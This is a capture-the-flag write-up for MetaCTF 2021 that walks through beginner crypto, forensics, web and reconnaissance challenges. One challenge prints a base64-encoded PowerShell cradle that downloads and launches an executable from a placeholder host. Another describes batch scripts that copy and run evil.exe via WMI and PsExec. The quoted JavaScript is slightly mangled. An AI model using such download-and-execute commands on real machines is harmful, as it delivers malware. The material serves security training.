MetaCTF 2021


A to Z (100 pts)

Tools: dCode

This encrypted flag will only require a simple substitution cipher to solve. Rearrange the letters from A to Z. yzhsufo_rh_nb_uze_wdziu

The string can be decoded using the Atbash cipher.

Thnks fr the Pwds (100 pts)

On a red team engagement, you discover a text file on an administrator’s desktop with all of their passwords - you now have the keys to the kingdom! During the engagement debrief, you explain what you found and how you were able to access so many systems. The administrator says that’s impossible, because they encrypted all of the passwords in the file. Here’s an example of one of their “encrypted” passwords: TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ== See if you’re able to recover the Administrator’s password.

This is a simple base64 encoded password, which can be decoded using

echo "TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ==" | base64 --decode

Wrong Way on a One Way Street (100pts))

Hashing is a system by which information is encrypted such that it can never be decrypted… theoretically. Websites will often hash passwords so that if their passwords are ever leaked, bad actors won’t actually learn the user’s password; they’ll just get an encrypted form of it. However, the same password will always hash to the same ciphertext, so if the attacker can guess your password, they can figure out the hash. Can you guess the password for this hash? cb78e77e659c1648416cf5ac43fca4b65eeaefe1

Rather than attempting to bruteforce the hash, let’s check it against a hash database. If we look up the hash on CrackStation, we can find the flag.


Magic in the Hex (100pts)

Sometimes in forensics, we run into files that have odd or unknown file extensions. In these cases, it’s helpful to look at some of the file format signatures to figure out what they are. We use something called “magic bytes” which are the first few bytes of a file. What is the ASCII representation of the magic bytes for a VMDK file? The flag format will be 3-4 letters (there are two correct answers).

We can take a look at the Wiki page for magic bytes,, and we can find the magic byte for VMDK files.

My Logs Know What You Did (125pts)

While investigating an incident, you identify a suspicious powershell command that was run on a compromised system … can you figure out what it was doing? C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -noP -sta -w 1 -enc TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUnv

The command being executed is PowerShell with base64 encoded payload. Let’s decode it using

echo "TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUn" | base64 --decode

I Just Wanna Run (150pts)

Our security team has identified evidence of ransomware deployment staging in the network. We’re trying to contain and remediate the malicious operator’s deployment staging and access before the operator successfully spreads and executes ransomware within the environment. We’ve recovered some of the operator’s staging scripts and files. Can you help identify which user account’s credentials the operator had compromised and is planning to use to execute the ransomware? The flag format will be METAL\xxxxx

First let’s extract Then, let’s analyze exe.bat, copy.bat, and wmi.bat.

  • wmi.bat uses WMI to create a new process which calls cmd /c COPY "\\share$\evil.exe" "C:\windows\temp\evil.exe"

  • copy.bat uses PsExec to call cmd /c COPY "\\share$\evil.exe" "C:\windows\temp\evil.exe"

  • exe.bat uses PsExec to call cmd /c c:\windows\temp\evil.exe

Therefore, the user being used to run the commands in exe.bat is the user being used to execute the malicious program.

Sharing Files and Passwords (150pts)

Tools: Wireshark

FTP servers are made to share files, but if its communications are not encrypted, it might be sharing passwords as well. The password in this pcap to get the flag

All we have to do to obtain the flag is apply the filter ftp to filter only FTP traffic. Then, we will see the ‘Request’ for the password, and the response of the users input.

Still Believe in Magic? (150pts)

We found an archive with a file in it, but there was no file extension so we’re not sure what it is. Can you figure out what kind of file it is and then open it?

We will extract magic.tar.gz using both gunzip and tar:

gunzip magic.tar.gz
tar -xvf magic.tar

Then, we can use file to figure out the file type.

file magic
>> magic: Zip archive data, at least v2.0 to extract, compression method=deflate

So magic is a zip archive. All we have to do is extract it to find the key.

mv magic
cat magic.txt


There Are No Strings On Me (100pts)

We’ve got this program that’s supposed to check a password, and we’re not quite sure how it works. Could you take a look at it and see about finding the password it’s looking for?

The flag can be obtained by simply checking the strings of the file.

strings strings

Web Exploitation

Under Inspection (100pts)

Someone made this this for the Autobots to chat with each other. Seems like the Decepticons have found the site too and made accounts. One of the Autobot accounts has a flag that they’re trying to keep hidden from the Decepticons, can you figure out which account it is and steal it?

If we analyze the HTML contents of the webpage, there is a script in the head of the HTML.

function loginSubmission() {a
	var username = document.getElementById("username").value;
	var password = document.getElementById("password").value;
	var result = document.getElementById("result");
	var accounts = [
		{user: "Admin", pwd: "MetaCTF{super_secure_password}"},
    {user: "Bumblebee", pwd: "MetaCTF{sting_like_a_bee}"},
    {user: "Starscream", pwd: "MetaCTF{the_best_leader_of_the_decepticons}"},
    {user: "Jazz", pwd: "[redacted]"},
    {user: "Megatron", pwd: "MetaCTF{peace_through_tyranny}"},
	for(var a in accounts) {
		if(accounts[a].user == username && accounts[a].pwd == password) {
			if(username == "Jazz") {
				result.innerHTML = "Welcome, Jazz. The flag is " + password;
			} else {
				result.innerHTML = "Welcome, " + username + ".";
			return false;
	result.innerHTML = "Login Failed. Please try again";
	return false;

Specifically, there is the check for username == "Jazz" which reveals the flag, so the flag is simply the password for user Jazz, which is found in the accounts[] array.


Sugar, We're Goin Up (125pts)

In September 2021, GitLab upgraded the CVSSv3 score for a critical remote code execution vulnerability to 10.0, the highest possible score. Although a patch was released in April, numerous public-facing, unpatched GitLab instances remain vulnerable. What is the CVE number for this critical, actively exploited vulnerability? The flag format will be CVE-XXXX-XXXX.

To find the CVE, it requires some basic reconnaissance. We can simply search “GitLab CVE April 2021” and we will find the correct CVE.

The Best Laid Plans (200pts)

Sometimes, routers can break packets up into fragments to meet abnormal networking requirements, and the endpoint will be responsible for putting these back together. Sometimes however, this doesn’t go as planned, as Microsoft found out with CVE-2021-24074. We’d like to see the function responsible for this vulnerability, but we’re having some trouble finding its name… Could you see if you could find it?

If we look up the CVE on AttackerKB, here, we can find a technical analysis of the vulnerability. Specifically, gwillcox-r7 leaves a Proof of Concept for the CVE. This PoC exploits the function Ipv4pReceiveRoutingHeader in the tcpip stack. (For a further technical analysis, Armis has a detailed walkthrough on finding the vulnerability here).

We Broke the Printer (200pts)

Malicious operators typically exploit unpatched vulnerabilities within target environments to gain initial access, escalate privileges, and more. What recent vulnerability have Conti ransomware operators exploited to run arbitrary code with SYSTEM privileges? The flag format will be CVE-xxxx-xxxxx

I started by looking up ‘Conti ransomware CVE’. The first page is a Joint Cybersecurity Advisory posted by the DoD. In this, they mention three exploits used to push the Conti ransomware, one; ‘printNightmare’ exploits Window’s print pooler service. Hence the name of the challenge, the CVE of printNightmare is our flag.


This Ain't a Scene, It's an Encryption Race (100pts)

Ransomware attacks continue to negatively impact businesses around the world. What is the Mitre ATT&CK technique ID for the encryption of data in an environment to disrupt business operations? The flag format will be T####.

A simple search of “mitr attack technique id for encryption” will reveal the flag on MITR’s “Data Encrypted for Impact” webpage.

Last updated